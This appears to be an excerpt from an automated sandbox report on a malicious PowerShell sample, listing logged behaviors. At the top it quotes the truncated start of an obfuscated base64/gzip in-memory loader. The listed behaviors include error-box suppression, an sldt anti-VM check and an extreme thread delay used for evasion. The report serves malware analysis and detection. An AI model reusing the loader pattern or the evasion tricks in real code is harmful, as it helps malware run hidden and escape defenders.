Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: NewEngineState=Available$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAK1Xa2/iShL9HH6FP0QCFALmESAjjTRtjMGEt8E8cqPI2G3T0H7EbmPDnfnvWzaQm9nJ7I60i2TRbldVnz51ulxWMLtXmE90NnANzN2r	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Powershell logging: NewEngineState=Available$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAK1Xa2/iShL9HH6FP0QCFALmESAjjTRtjMGEt8E8cqPI2G3T0H7EbmPDnfnvWzaQm9nJ7I60i2TRbldVnz51ulxWMLtXmE90NnANzN2r	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFA35CD6BEB push ecx; iretd	0_2_00007FFA35CD6BEC
Source: C:\Windows\SysWOW64\WerFault.exe	Code function: 13_2_007DC110 pushad ; ret	13_2_007DC111
Source: C:\Windows\SysWOW64\WerFault.exe	Code function: 13_2_007D5BE5 push cs; retf	13_2_007D5BE6
Source: C:\Windows\SysWOW64\WerFault.exe	Code function: 13_2_007DC0A3 pushad ; ret	13_2_007DC0B9
Source: C:\Windows\SysWOW64\WerFault.exe	Code function: 13_2_007DEAA2 pushad ; ret	13_2_007DEAA4
Source: C:\Windows\SysWOW64\WerFault.exe	Code function: 13_2_007DC298 push esp; retf	13_2_007DC299

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FFA35CD0F91 sldt word ptr [eax]

0_2_00007FFA35CD0F91

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
